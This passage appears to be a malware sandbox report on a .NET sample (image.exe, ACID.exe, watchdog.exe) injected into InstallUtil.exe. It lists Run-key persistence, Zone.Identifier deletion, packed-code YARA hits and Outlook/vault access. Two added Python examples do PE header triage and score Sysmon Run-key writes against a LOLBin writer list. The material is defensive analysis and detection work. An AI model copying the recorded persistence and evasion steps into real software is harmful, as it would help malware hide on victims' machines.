                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\Desktop\image.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\image.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: image.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: image.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: image.exeStatic file information: File size 2652672 > 1048576
                    Source: image.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x276800
                    Source: image.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: VsUPptm.exe.16.dr
                    Source: Binary string: InstallUtil.pdb source: VsUPptm.exe.16.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: ACID.exe, 0000000F.00000002.3441640640.00000000011EC000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: Yara match | File source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.5dc1038.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.5ec1058.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.6f40000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.5ec1058.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.6f40000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.3447289746.000000000309A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.3447289746.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2378327661.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
                    Source: watchdog.exe.15.dr | Static PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_04BDB5A2 push eax; iretd 0_2_04BDB5E1
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0972C436 pushad ; iretd 0_2_0972C3D2
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0972C3D1 pushad ; iretd 0_2_0972C3D2
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_098A5E48 pushad ; retf 0_2_098A5E49
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09AFAE90 pushad ; ret 0_2_09AFAE98
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09AFAE04 push eax; ret 0_2_09AFAE05
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09AF6C7D push eax; ret 0_2_09AF6D86
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2FA2BD push FFFFFF8Bh; iretd 0_2_0B2FA2BF
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2F7AED push eax; retf 0_2_0B2F7C2D
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2F2573 push ebx; ret 0_2_0B2F2579
                    Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2F7C35 push ebx; retf 0_2_0B2F7CF2
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_013E42D9 push ebx; ret 15_2_013E42DA
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07C5BFD1 pushad ; retf 15_2_07C5BFD2
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_0836C8DC push eax; retf 15_2_0836C8DD
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_0836C207 push 8B03FA99h; iretd 15_2_0836C20C
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08366205 push eax; ret 15_2_0836630E
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_0836DEBB push ebx; ret 15_2_0836DEC1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 16_2_01700C6D push edi; retf 16_2_01700C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 16_2_01700C55 push ebx; retf 16_2_01700C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 16_2_01700CCB push edi; retf 16_2_01700C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 16_2_06D887D8 push edi; iretd 16_2_06D887E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 16_2_06D845A0 push es; iretd 16_2_06D845AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 16_2_06D8A9C0 push es; iretd 16_2_06D8A9CE
                    Source: image.exe, Ec91Lr.cs | High entropy of concatenated method names: 'g1C', 'Nx1', 'Sp8', 'g2H', 'k1L8Qq', 'Pz94Fp', 'p2LSs1', 'f9T4Mq', 'Gj8i6W', 'Zc80Aq'
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs | High entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, gabKErPURPS76kDKjrme.cs | High entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs | High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                    Source: 0.2.image.exe.2c3e1b8.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs | High entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                    Source: 0.2.image.exe.2c3e1b8.0.raw.unpack, gabKErPURPS76kDKjrme.cs | High entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                    Source: 0.2.image.exe.2c3e1b8.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs | High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                    Source: ACID.exe.7.dr, Ec91Lr.cs | High entropy of concatenated method names: 'g1C', 'Nx1', 'Sp8', 'g2H', 'k1L8Qq', 'Pz94Fp', 'p2LSs1', 'f9T4Mq', 'Gj8i6W', 'Zc80Aq'
                    Source: watchdog.exe.15.dr, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs | High entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                    Source: watchdog.exe.15.dr, gabKErPURPS76kDKjrme.cs | High entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                    Source: watchdog.exe.15.dr, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs | High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | File created: C:\Users\user\AppData\Local\Temp\watchdog.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe
                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\ACID.exe
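                    The static PE findings for image.exe (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present, .text larger than 0x100000, the DllCharacteristics flag set) and the watchdog.exe compile stamp 0xC7142059, which decodes to the year 2075, are all plain header reads that can be reproduced offline. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses the COFF header, optional header and section table with struct, emits the same findings the report does, and runs against a header-only PE32 constructed from the report's numbers. The .text virtual size (set equal to the raw size) and the CLR header RVA/size are assumptions, since the report gives neither. One caveat a practitioner should keep in mind: since Roslyn's deterministic builds the TimeDateStamp of a .NET assembly holds a content hash rather than a time, so a nonsensical stamp on a .NET binary is weak evidence on its own; it is the combination with the other findings that matters.

```python
"""Static PE header triage reproducing the report's checks (added example)."""
import struct
from datetime import datetime, timedelta, timezone

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h, in ascending bit order
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
COM_DESCRIPTOR = 14      # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: non-zero => .NET assembly
BIG_SECTION = 0x100000   # 1 MiB, the threshold the report applies to .text
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def pe_timestamp_utc(ts):
    """Decode a COFF TimeDateStamp (seconds since the Unix epoch) as a UTC datetime."""
    return EPOCH + timedelta(seconds=ts)


def parse_pe(data):
    """Return the header fields the triage needs from a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _sym, _nsym, opt_size, _flags = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                       # PE32
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                     # PE32+ (8-byte ImageBase and stack/heap fields)
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    dirs = [struct.unpack_from("<II", data, dirs_off + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):               # section table follows the optional header
        name, vsize, _va, rawsize, _rawptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": rawsize})
    return {
        "timestamp": timestamp,
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dllchar & bit],
        "is_dotnet": ndirs > COM_DESCRIPTOR and dirs[COM_DESCRIPTOR][0] != 0,
        "sections": sections,
    }


def triage(data, now=None):
    """Produce report-style findings as strings; `now` is injectable for testing."""
    pe = parse_pe(data)
    now = now or datetime.now(timezone.utc)
    findings = []
    if pe["is_dotnet"]:
        findings.append("data directory IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present (.NET assembly)")
    built = pe_timestamp_utc(pe["timestamp"])
    if built > now:
        # Weak signal for .NET: deterministic builds store a content hash here.
        findings.append("TimeDateStamp 0x%08X is in the future: %s UTC"
                        % (pe["timestamp"], built.strftime("%Y-%m-%d %H:%M:%S")))
    for s in pe["sections"]:
        if s["virtual_size"] > BIG_SECTION:
            findings.append("virtual size of %s is bigger than 0x%X: 0x%X"
                            % (s["name"], BIG_SECTION, s["virtual_size"]))
        if s["raw_size"] > BIG_SECTION:
            findings.append("raw size of %s is bigger than 0x%X: 0x%X"
                            % (s["name"], BIG_SECTION, s["raw_size"]))
    if pe["dll_characteristics"]:
        findings.append("DllCharacteristics: " + ", ".join(pe["dll_characteristics"]))
    return findings


def build_sample_pe():
    """Header-only PE32 carrying the values the report lists (constructed, not image.exe)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # i386, 1 section, TimeDateStamp 0xC7142059, 224-byte optional header, EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0xC7142059, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, 0x8560)  # HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|NO_SEH|TS_AWARE
    struct.pack_into("<I", opt, 92, 16)
    struct.pack_into("<II", opt, 96 + 8 * COM_DESCRIPTOR, 0x2008, 0x48)  # CLR header (assumed RVA/size)
    # .text: virtual size assumed equal to the reported raw size 0x276800; no data follows
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x276800, 0x2000, 0x276800, 0x200,
                       0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    for line in triage(build_sample_pe()):
        print(line)
```

                    Point `parse_pe` at the bytes of a real dropped file and the same five findings come back for any sample with these traits; for a PE32+ image the optional-header offsets switch automatically on the magic value.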

                    Boot Survival

                    Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACID
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VsUPptm
                    Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACID
                    Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACID
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VsUPptm
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VsUPptm
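                    The two Run values above are written by reg.exe (ACID) and by InstallUtil.exe (VsUPptm), a signed .NET framework utility that, according to the report, is also the process the payload is injected into. Neither binary has a legitimate reason to create an autostart entry, and that is the detection hook rather than the value names, which change per build. The Python below is an added example, not part of the Joe Sandbox report: it scores Sysmon Event ID 13 (RegistryEvent, value set) records for Run/RunOnce writes by known LOLBins and for autostart targets that resolve into user-writable directories. The four events are constructed; Sysmon renders HKCU as HKU\<SID> and the SID is made up, and the value data is assumed to point at the dropped files the report lists, which the report does not itself state. The writer list extends beyond the two binaries seen here and should be tuned per estate.

```python
"""Score Sysmon Event ID 13 records for Run-key persistence (added example)."""
import re

RUN_KEY = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\([^\\]+)$", re.IGNORECASE)
# reg.exe and InstallUtil.exe are the writers in this report; the rest are other
# LOLBins that never need to create autostart values (assumed list, tune per estate).
SUSPICIOUS_WRITERS = {"reg.exe", "installutil.exe", "regasm.exe", "regsvcs.exe",
                      "msbuild.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                      "rundll32.exe", "powershell.exe", "cmd.exe"}
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\",
                 "\\users\\public\\", "\\programdata\\")

SID = r"HKU\S-1-5-21-1111-2222-3333-1001"   # made-up user hive path (Sysmon form of HKCU)
SAMPLE_EVENTS = [  # constructed Sysmon Event ID 13 records
    {"Image": r"C:\Windows\SysWOW64\reg.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\ACID",
     "Details": r"C:\Users\user\AppData\Roaming\ACID.exe"},
    {"Image": r"C:\Program Files\Contoso\Updater\setup.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\ContosoUpdater",
     "Details": r'"C:\Program Files\Contoso\Updater\updater.exe" /background'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\VsUPptm",
     "Details": r"C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop",
     "Details": r"C:\Users\user\Desktop"},
]


def target_exe(details):
    """First path token of REG_SZ value data, handling both quoted and bare forms."""
    d = details.strip()
    if d.startswith('"'):
        return d[1:d.find('"', 1)]
    return d.split(" ", 1)[0]


def score_event(ev):
    """Return a scored record for a Run/RunOnce write, or None for any other key."""
    m = RUN_KEY.search(ev["TargetObject"])
    if not m:
        return None
    score, reasons = 1, ["autostart value written"]
    writer = ev["Image"].rsplit("\\", 1)[-1].lower()
    if writer in SUSPICIOUS_WRITERS:
        score += 2
        reasons.append("written by LOLBin %s" % writer)
    exe = target_exe(ev["Details"]).lower()
    if any(p in exe for p in USER_WRITABLE):
        score += 2
        reasons.append("autostart target lives in a user-writable directory")
    if "\\microsoft.net\\framework" in ev["Image"].lower():
        score += 1   # framework hosts such as InstallUtil.exe are common injection targets
        reasons.append("writer is a .NET framework host")
    return {"key": m.group(1), "value": m.group(2), "writer": writer,
            "target": exe, "score": score, "reasons": reasons}


def detect_run_key_persistence(events, threshold=3):
    """Alerts, in event order, for Run-key writes scoring at or above the threshold."""
    alerts = []
    for ev in events:
        rec = score_event(ev)
        if rec and rec["score"] >= threshold:
            alerts.append(rec)
    return alerts


if __name__ == "__main__":
    for a in detect_run_key_persistence(SAMPLE_EVENTS):
        print("%d %s\\%s <- %s (%s)" % (a["score"], a["key"], a["value"], a["writer"], "; ".join(a["reasons"])))
```

                    The benign ContosoUpdater write scores 1 and is dropped, while the two writes mirroring the report score 5 and 6; on live telemetry the same scorer can be fed from the Sysmon EventData fields of each Event ID 13 record.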

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\image.exe | File opened: C:\Users\user\Desktop\image.exe\:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | File opened: C:\Users\user\AppData\Roaming\ACID.exe\:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\image.exe | Process information set: NOOPENFILEERRORBOX (48 identical entries)
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Process information set: NOOPENFILEERRORBOX (49 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX (8 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
